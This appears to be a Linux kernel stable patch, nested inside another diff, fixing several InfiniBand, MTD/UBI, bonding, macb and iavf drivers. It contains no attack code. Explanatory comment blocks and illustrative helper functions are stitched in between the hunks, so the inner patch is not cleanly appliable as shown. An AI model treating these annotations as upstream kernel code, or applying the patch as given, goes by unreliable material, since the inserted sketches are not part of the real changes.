+--- a/drivers/infiniband/hw/erdma/erdma_qp.c
++++ b/drivers/infiniband/hw/erdma/erdma_qp.c
+@@ -405,7 +405,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 			FIELD_PREP(ERDMA_SQE_MR_MTT_CNT_MASK,
+ 				   mr->mem.mtt_nents);
+ 
+-		if (mr->mem.mtt_nents < ERDMA_MAX_INLINE_MTT_ENTRIES) {
++		if (mr->mem.mtt_nents <= ERDMA_MAX_INLINE_MTT_ENTRIES) {
+ 			attrs |= FIELD_PREP(ERDMA_SQE_MR_MTT_TYPE_MASK, 0);
+ 			/* Copy SGLs to SQE content to accelerate */
+ 			memcpy(get_queue_entry(qp->kern_qp.sq_buf, idx + 1,
+@@ -439,7 +439,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 				cpu_to_le64(atomic_wr(send_wr)->compare_add);
+ 		} else {
+ 			wqe_hdr |= FIELD_PREP(ERDMA_SQE_HDR_OPCODE_MASK,
+-					      ERDMA_OP_ATOMIC_FAD);
++					      ERDMA_OP_ATOMIC_FAA);
+ 			atomic_sqe->fetchadd_swap_data =
+ 				cpu_to_le64(atomic_wr(send_wr)->compare_add);
+ 		}
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.h b/drivers/infiniband/hw/erdma/erdma_verbs.h
+index e0a993bc032a4..131cf5f409822 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.h
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.h
+@@ -11,7 +11,7 @@
+ 
+ /* RDMA Capability. */
+ #define ERDMA_MAX_PD (128 * 1024)
+-#define ERDMA_MAX_SEND_WR 4096
++#define ERDMA_MAX_SEND_WR 8192
+ #define ERDMA_MAX_ORD 128
+ #define ERDMA_MAX_IRD 128
+ #define ERDMA_MAX_SGE_RD 1
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 195aa9ea18b6c..8817864154af1 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1458,13 +1458,15 @@ static int irdma_send_fin(struct irdma_cm_node *cm_node)
+  * irdma_find_listener - find a cm node listening on this addr-port pair
+  * @cm_core: cm's core
+  * @dst_addr: listener ip addr
++ * @ipv4: flag indicating IPv4 when true
+  * @dst_port: listener tcp port num
+  * @vlan_id: virtual LAN ID
+  * @listener_state: state to match with listen node's
+  */
+ static struct irdma_cm_listener *
+-irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+-		    u16 vlan_id, enum irdma_cm_listener_state listener_state)
++irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, bool ipv4,
++		    u16 dst_port, u16 vlan_id,
++		    enum irdma_cm_listener_state listener_state)
+ {
+ 	struct irdma_cm_listener *listen_node;
+ 	static const u32 ip_zero[4] = { 0, 0, 0, 0 };
+@@ -1477,7 +1479,7 @@ irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+ 	list_for_each_entry (listen_node, &cm_core->listen_list, list) {
+ 		memcpy(listen_addr, listen_node->loc_addr, sizeof(listen_addr));
+ 		listen_port = listen_node->loc_port;
+-		if (listen_port != dst_port ||
++		if (listen_node->ipv4 != ipv4 || listen_port != dst_port ||
+ 		    !(listener_state & listen_node->listener_state))
+ 			continue;
+ 		/* compare node pair, return node handle if a match */
+@@ -2902,9 +2904,10 @@ irdma_make_listen_node(struct irdma_cm_core *cm_core,
+ 	unsigned long flags;
+ 
+ 	/* cannot have multiple matching listeners */
+-	listener = irdma_find_listener(cm_core, cm_info->loc_addr,
+-				       cm_info->loc_port, cm_info->vlan_id,
+-				       IRDMA_CM_LISTENER_EITHER_STATE);
++	listener =
++		irdma_find_listener(cm_core, cm_info->loc_addr, cm_info->ipv4,
++				    cm_info->loc_port, cm_info->vlan_id,
++				    IRDMA_CM_LISTENER_EITHER_STATE);
+ 	if (listener &&
+ 	    listener->listener_state == IRDMA_CM_LISTENER_ACTIVE_STATE) {
+ 		refcount_dec(&listener->refcnt);
+@@ -3153,6 +3156,7 @@ void irdma_receive_ilq(struct irdma_sc_vsi *vsi, struct irdma_puda_buf *rbuf)
+ 
+ 		listener = irdma_find_listener(cm_core,
+ 					       cm_info.loc_addr,
++					       cm_info.ipv4,
+ 					       cm_info.loc_port,
+ 					       cm_info.vlan_id,
+ 					       IRDMA_CM_LISTENER_ACTIVE_STATE);
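+/*
+ * The irdma hunks above make the listener lookup family-aware: an IPv4
+ * and an IPv6 listener on the same port could previously shadow each
+ * other, because only the port, VLAN and address bytes were compared.
+ * A minimal sketch of the stricter predicate, with hypothetical helper
+ * naming (the real check lives inline in irdma_find_listener()):
+ */
+static bool listener_matches(const struct irdma_cm_listener *l, bool ipv4,
+			     u16 port, enum irdma_cm_listener_state state)
+{
+	return l->ipv4 == ipv4 &&
+	       l->loc_port == port &&
+	       (l->listener_state & state);
+}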
+diff --git a/drivers/infiniband/hw/irdma/cm.h b/drivers/infiniband/hw/irdma/cm.h
+index 19c284975fc7c..7feadb3e1eda3 100644
+--- a/drivers/infiniband/hw/irdma/cm.h
++++ b/drivers/infiniband/hw/irdma/cm.h
+@@ -41,7 +41,7 @@
+ #define TCP_OPTIONS_PADDING	3
+ 
+ #define IRDMA_DEFAULT_RETRYS	64
+-#define IRDMA_DEFAULT_RETRANS	8
++#define IRDMA_DEFAULT_RETRANS	32
+ #define IRDMA_DEFAULT_TTL		0x40
+ #define IRDMA_DEFAULT_RTT_VAR		6
+ #define IRDMA_DEFAULT_SS_THRESH		0x3fffffff
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 2e1e2bad04011..43dfa4761f069 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -41,6 +41,7 @@ static enum irdma_hmc_rsrc_type iw_hmc_obj_types[] = {
+ 	IRDMA_HMC_IW_XFFL,
+ 	IRDMA_HMC_IW_Q1,
+ 	IRDMA_HMC_IW_Q1FL,
++	IRDMA_HMC_IW_PBLE,
+ 	IRDMA_HMC_IW_TIMER,
+ 	IRDMA_HMC_IW_FSIMC,
+ 	IRDMA_HMC_IW_FSIAV,
+@@ -827,6 +828,8 @@ static int irdma_create_hmc_objs(struct irdma_pci_f *rf, bool privileged,
+ 	info.entry_type = rf->sd_type;
+ 
+ 	for (i = 0; i < IW_HMC_OBJ_TYPE_NUM; i++) {
++		if (iw_hmc_obj_types[i] == IRDMA_HMC_IW_PBLE)
++			continue;
+ 		if (dev->hmc_info->hmc_obj[iw_hmc_obj_types[i]].cnt) {
+ 			info.rsrc_type = iw_hmc_obj_types[i];
+ 			info.count = dev->hmc_info->hmc_obj[info.rsrc_type].cnt;
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 445e69e864097..7887230c867b1 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2595,7 +2595,10 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+-
++			if (cmpl->cpi.op_type == IRDMAQP_OP_NOP) {
++				kfree(cmpl);
++				continue;
++			}
+ 			ibdev_dbg(iwqp->iwscq->ibcq.device,
+ 				  "DEV: %s: adding wr_id = 0x%llx SQ Completion to list qp_id=%d\n",
+ 				  __func__, cmpl->cpi.wr_id, qp->qp_id);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index c669ef6e47e73..eaa35e1df2a85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -442,6 +442,10 @@ static int translate_eth_ext_proto_oper(u32 eth_proto_oper, u16 *active_speed,
+ 		*active_width = IB_WIDTH_2X;
+ 		*active_speed = IB_SPEED_NDR;
+ 		break;
++	case MLX5E_PROT_MASK(MLX5E_400GAUI_8):
++		*active_width = IB_WIDTH_8X;
++		*active_speed = IB_SPEED_HDR;
++		break;
+ 	case MLX5E_PROT_MASK(MLX5E_400GAUI_4_400GBASE_CR4_KR4):
+ 		*active_width = IB_WIDTH_4X;
+ 		*active_speed = IB_SPEED_NDR;
+diff --git a/drivers/mtd/mtdblock.c b/drivers/mtd/mtdblock.c
+index 1e94e7d10b8be..a0a1194dc1d90 100644
+--- a/drivers/mtd/mtdblock.c
++++ b/drivers/mtd/mtdblock.c
+@@ -153,7 +153,7 @@ static int do_cached_write (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 				mtdblk->cache_state = STATE_EMPTY;
+ 				ret = mtd_read(mtd, sect_start, sect_size,
+ 					       &retlen, mtdblk->cache_data);
+-				if (ret)
++				if (ret && !mtd_is_bitflip(ret))
+ 					return ret;
+ 				if (retlen != sect_size)
+ 					return -EIO;
+@@ -188,8 +188,12 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 	pr_debug("mtdblock: read on \"%s\" at 0x%lx, size 0x%x\n",
+ 			mtd->name, pos, len);
+ 
+-	if (!sect_size)
+-		return mtd_read(mtd, pos, len, &retlen, buf);
++	if (!sect_size) {
++		ret = mtd_read(mtd, pos, len, &retlen, buf);
++		if (ret && !mtd_is_bitflip(ret))
++			return ret;
++		return 0;
++	}
+ 
+ 	while (len > 0) {
+ 		unsigned long sect_start = (pos/sect_size)*sect_size;
+@@ -209,7 +213,7 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 			memcpy (buf, mtdblk->cache_data + offset, size);
+ 		} else {
+ 			ret = mtd_read(mtd, pos, size, &retlen, buf);
+-			if (ret)
++			if (ret && !mtd_is_bitflip(ret))
+ 				return ret;
+ 			if (retlen != size)
+ 				return -EIO;
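+/*
+ * Context for the mtdblock hunks: mtd_read() reports corrected bitflips
+ * as -EUCLEAN, for which mtd_is_bitflip() returns true, even though the
+ * returned data is valid. The fix stops treating that as a hard failure.
+ * A minimal sketch of the idiom with hypothetical surrounding names
+ * (mtd_read() and mtd_is_bitflip() come from <linux/mtd/mtd.h>):
+ */
+static int example_mtd_read(struct mtd_info *mtd, loff_t pos, size_t len,
+			    u_char *buf)
+{
+	size_t retlen;
+	int ret = mtd_read(mtd, pos, len, &retlen, buf);
+
+	if (ret && !mtd_is_bitflip(ret))
+		return ret;		/* hard I/O error */
+	if (retlen != len)
+		return -EIO;		/* short read */
+	return 0;			/* ok, possibly with corrected bitflips */
+}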
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index a28574c009003..074e14225c06a 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -280,7 +280,7 @@ static void meson_nfc_cmd_access(struct nand_chip *nand, int raw, bool dir,
+ 
+ 	if (raw) {
+ 		len = mtd->writesize + mtd->oobsize;
+-		cmd = (len & GENMASK(5, 0)) | scrambler | DMA_DIR(dir);
++		cmd = (len & GENMASK(13, 0)) | scrambler | DMA_DIR(dir);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 		return;
+ 	}
+@@ -544,7 +544,7 @@ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		goto out;
+ 
+-	cmd = NFC_CMD_N2M | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_N2M | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+@@ -568,7 +568,7 @@ static int meson_nfc_write_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		return ret;
+ 
+-	cmd = NFC_CMD_M2N | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_M2N | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
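+/*
+ * Why the meson_nand mask change matters: per these hunks the
+ * controller's command length field is 14 bits wide, and a raw
+ * page-plus-OOB transfer already exceeds what GENMASK(5, 0) can carry,
+ * so the programmed DMA length was silently truncated. Worked example
+ * for a 2K page with 64 bytes of OOB:
+ *
+ *	len = 2048 + 64 = 2112 = 0x840
+ *	2112 & GENMASK(5, 0)  = 0x000  (truncated)
+ *	2112 & GENMASK(13, 0) = 0x840  (intact)
+ */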
+diff --git a/drivers/mtd/nand/raw/stm32_fmc2_nand.c b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+index 5d627048c420d..9e74bcd90aaa2 100644
+--- a/drivers/mtd/nand/raw/stm32_fmc2_nand.c
++++ b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+@@ -1531,6 +1531,9 @@ static int stm32_fmc2_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 	if (IS_ERR(sdrt))
+ 		return PTR_ERR(sdrt);
+ 
++	if (conf->timings.mode > 3)
++		return -EOPNOTSUPP;
++
+ 	if (chipnr == NAND_DATA_IFACE_CHECK_ONLY)
+ 		return 0;
+ 
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 7f65af1697519..1662c12e24ada 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -664,12 +664,6 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
+-	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
+-	    ubi->vid_hdr_alsize)) {
+-		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
+-		return -EINVAL;
+-	}
+-
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+@@ -687,6 +681,21 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 						ubi->vid_hdr_aloffset;
+ 	}
+ 
++	/*
++	 * Memory allocation for VID header is ubi->vid_hdr_alsize
++	 * which is described in comments in io.c.
++	 * Make sure VID header shift + UBI_VID_HDR_SIZE does not exceed
++	 * ubi->vid_hdr_alsize, so that all VID header operations
++	 * won't access memory out of bounds.
++	 */
++	if ((ubi->vid_hdr_shift + UBI_VID_HDR_SIZE) > ubi->vid_hdr_alsize) {
++		ubi_err(ubi, "Invalid VID header offset %d, VID header shift(%d)"
++			" + VID header size(%zu) > VID header aligned size(%d).",
++			ubi->vid_hdr_offset, ubi->vid_hdr_shift,
++			UBI_VID_HDR_SIZE, ubi->vid_hdr_alsize);
++		return -EINVAL;
++	}
++
+ 	/* Similar for the data offset */
+ 	ubi->leb_start = ubi->vid_hdr_offset + UBI_VID_HDR_SIZE;
+ 	ubi->leb_start = ALIGN(ubi->leb_start, ubi->min_io_size);
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 9e14319225c97..6049ab9e46479 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -575,7 +575,7 @@ static int erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk,
+  * @vol_id: the volume ID that last used this PEB
+  * @lnum: the last used logical eraseblock number for the PEB
+  * @torture: if the physical eraseblock has to be tortured
+- * @nested: denotes whether the work_sem is already held in read mode
++ * @nested: denotes whether the work_sem is already held
+  *
+  * This function returns zero in case of success and a %-ENOMEM in case of
+  * failure.
+@@ -1131,7 +1131,7 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		int err1;
+ 
+ 		/* Re-schedule the LEB for erasure */
+-		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
++		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, true);
+ 		if (err1) {
+ 			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 116d295df0b55..415cd95fb140f 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3267,7 +3267,8 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 
+ 	combined = skb_header_pointer(skb, 0, sizeof(_combined), &_combined);
+ 	if (!combined || combined->ip6.nexthdr != NEXTHDR_ICMP ||
+-	    combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT)
++	    (combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_SOLICITATION &&
++	     combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT))
+ 		goto out;
+ 
+ 	saddr = &combined->ip6.saddr;
+@@ -3289,7 +3290,7 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 	else if (curr_active_slave &&
+ 		 time_after(slave_last_rx(bond, curr_active_slave),
+ 			    curr_active_slave->last_link_up))
+-		bond_validate_na(bond, slave, saddr, daddr);
++		bond_validate_na(bond, slave, daddr, saddr);
+ 	else if (curr_arp_slave &&
+ 		 bond_time_in_interval(bond, slave_last_tx(curr_arp_slave), 1))
+ 		bond_validate_na(bond, slave, saddr, daddr);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 6cda31520c425..5b230831a4551 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -1009,6 +1009,10 @@ static dma_addr_t macb_get_addr(struct macb *bp, struct macb_dma_desc *desc)
+ 	}
+ #endif
+ 	addr |= MACB_BF(RX_WADDR, MACB_BFEXT(RX_WADDR, desc->addr));
++#ifdef CONFIG_MACB_USE_HWSTAMP
++	if (bp->hw_dma_cap & HW_DMA_CAP_PTP)
++		addr &= ~GEM_BIT(DMA_RXVALID);
++#endif
+ 	return addr;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 2a9f1eeeb7015..93a998f169de7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -58,8 +58,6 @@ enum iavf_vsi_state_t {
+ struct iavf_vsi {
+ 	struct iavf_adapter *back;
+ 	struct net_device *netdev;
+-	unsigned long active_cvlans[BITS_TO_LONGS(VLAN_N_VID)];
+-	unsigned long active_svlans[BITS_TO_LONGS(VLAN_N_VID)];
+ 	u16 seid;
+ 	u16 id;
+ 	DECLARE_BITMAP(state, __IAVF_VSI_STATE_SIZE__);
+@@ -157,15 +155,20 @@ struct iavf_vlan {
+ 	u16 tpid;
+ };
+ 
++enum iavf_vlan_state_t {
++	IAVF_VLAN_INVALID,
++	IAVF_VLAN_ADD,		/* filter needs to be added */
++	IAVF_VLAN_IS_NEW,	/* filter is new, wait for PF answer */
++	IAVF_VLAN_ACTIVE,	/* filter is accepted by PF */
++	IAVF_VLAN_DISABLE,	/* filter needs to be deleted by PF, then marked INACTIVE */
++	IAVF_VLAN_INACTIVE,	/* filter is inactive, we are in IFF_DOWN */
++	IAVF_VLAN_REMOVE,	/* filter needs to be removed from list */
++};
++
+ struct iavf_vlan_filter {
+ 	struct list_head list;
+ 	struct iavf_vlan vlan;
+-	struct {
+-		u8 is_new_vlan:1;	/* filter is new, wait for PF answer */
+-		u8 remove:1;		/* filter needs to be removed */
+-		u8 add:1;		/* filter needs to be added */
+-		u8 padding:5;
+-	};
++	enum iavf_vlan_state_t state;
+ };
+ 
+ #define IAVF_MAX_TRAFFIC_CLASS	4
+@@ -257,6 +260,7 @@ struct iavf_adapter {
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
++	int num_vlan_filters;
+ 	struct list_head mac_filter_list;
+ 	struct mutex crit_lock;
+ 	struct mutex client_lock;
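+/*
+ * The three iavf bitfields become an explicit per-filter state machine.
+ * A rough transition sketch derived from the per-state comments above
+ * (IAVF_VLAN_ prefixes dropped; not an authoritative diagram):
+ *
+ *	ADD      --sent to PF-->      IS_NEW   --PF ack-->      ACTIVE
+ *	ACTIVE   --interface down-->  DISABLE  --sent to PF-->  INACTIVE
+ *	INACTIVE --interface up-->    ADD      (iavf_restore_filters())
+ *	any      --user delete-->     REMOVE   --sent to PF-->  freed
+ *
+ * Keeping INACTIVE filters on the list across IFF_DOWN is what lets an
+ * up/down cycle restore them, replacing the separate active_cvlans /
+ * active_svlans bitmaps that could fall out of sync with the list.
+ */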
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 8bbdf66c51f6a..05a0ea96dd11a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -791,7 +791,8 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		f->vlan = vlan;
+ 
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+-		f->add = true;
++		f->state = IAVF_VLAN_ADD;
++		adapter->num_vlan_filters++;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 	}
+ 
+@@ -813,7 +814,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+-		f->remove = true;
++		f->state = IAVF_VLAN_REMOVE;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
+ 	}
+ 
+@@ -828,14 +829,18 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+  **/
+ static void iavf_restore_filters(struct iavf_adapter *adapter)
+ {
+-	u16 vid;
++	struct iavf_vlan_filter *f;
+ 
+ 	/* re-add all VLAN filters */
+-	for_each_set_bit(vid, adapter->vsi.active_cvlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021Q));
++	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	for_each_set_bit(vid, adapter->vsi.active_svlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021AD));
++	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
++		if (f->state == IAVF_VLAN_INACTIVE)
++			f->state = IAVF_VLAN_ADD;
++	}
++
++	spin_unlock_bh(&adapter->mac_vlan_list_lock);
++	adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ }
+ 
+ /**
+@@ -844,8 +849,7 @@ static void iavf_restore_filters(struct iavf_adapter *adapter)
+  */
+ u16 iavf_get_num_vlans_added(struct iavf_adapter *adapter)
+ {
+-	return bitmap_weight(adapter->vsi.active_cvlans, VLAN_N_VID) +
+-		bitmap_weight(adapter->vsi.active_svlans, VLAN_N_VID);
++	return adapter->num_vlan_filters;
+ }
+ 
+ /**
+@@ -928,11 +932,6 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ 		return 0;
+ 
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+-	if (proto == cpu_to_be16(ETH_P_8021Q))
+-		clear_bit(vid, adapter->vsi.active_cvlans);
+-	else
+-		clear_bit(vid, adapter->vsi.active_svlans);
+-
+ 	return 0;
+ }
+ 
+@@ -1293,16 +1292,11 @@ static void iavf_clear_mac_vlan_filters(struct iavf_adapter *adapter)
+ 		}
+ 	}
+ 
+-	/* remove all VLAN filters */
++	/* disable all VLAN filters */
+ 	list_for_each_entry_safe(vlf, vlftmp, &adapter->vlan_filter_list,
+-				 list) {
+-		if (vlf->add) {
+-			list_del(&vlf->list);
+-			kfree(vlf);
+-		} else {
+-			vlf->remove = true;
+-		}
+-	}
++				 list)
++		vlf->state = IAVF_VLAN_DISABLE;
++
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ }
+ 
+@@ -2914,6 +2908,7 @@ static void iavf_disable_vf(struct iavf_adapter *adapter)
+ 		list_del(&fv->list);
+ 		kfree(fv);
+ 	}
++	adapter->num_vlan_filters = 0;
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+@@ -3131,9 +3126,6 @@ continue_reset:
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_CLOUD_FILTER;
+ 	iavf_misc_irq_enable(adapter);
+ 
+-	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+-	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+-
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 0fea6b9b599fb..07d37402a0df5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -642,16 +642,10 @@ static void iavf_vlan_add_reject(struct iavf_adapter *adapter)
+ 
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 	list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-		if (f->is_new_vlan) {
+-			if (f->vlan.tpid == ETH_P_8021Q)
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_cvlans);
+-			else
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_svlans);
+-
++		if (f->state == IAVF_VLAN_IS_NEW) {
+ 			list_del(&f->list);
+ 			kfree(f);
++			adapter->num_vlan_filters--;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -679,7 +673,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+ 	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-		if (f->add)
++		if (f->state == IAVF_VLAN_ADD)
+ 			count++;
+ 	}
+ 	if (!count || !VLAN_FILTERING_ALLOWED(adapter)) {
+@@ -710,11 +704,10 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -760,7 +753,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -778,8 +771,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 				vlan->tpid = f->vlan.tpid;
+ 
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 			}
+ 		}
+ 
+@@ -822,10 +814,16 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		 * filters marked for removal to enable bailing out before
+ 		 * sending a virtchnl message
+ 		 */
+-		if (f->remove && !VLAN_FILTERING_ALLOWED(adapter)) {
++		if (f->state == IAVF_VLAN_REMOVE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
+ 			list_del(&f->list);
+ 			kfree(f);
+-		} else if (f->remove) {
++			adapter->num_vlan_filters--;
++		} else if (f->state == IAVF_VLAN_DISABLE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
++			f->state = IAVF_VLAN_INACTIVE;
++		} else if (f->state == IAVF_VLAN_REMOVE ||
++			   f->state == IAVF_VLAN_DISABLE) {
+ 			count++;
+ 		}
+ 	}
+@@ -857,11 +855,18 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
++				f->state = IAVF_VLAN_INACTIVE;
+ 				i++;
++				if (i == count)
++					break;
++			} else if (f->state == IAVF_VLAN_REMOVE) {
++				vvfl->vlan_id[i] = f->vlan.vid;
+ 				list_del(&f->list);
+ 				kfree(f);
++				adapter->num_vlan_filters--;
++				i++;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -901,7 +906,8 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
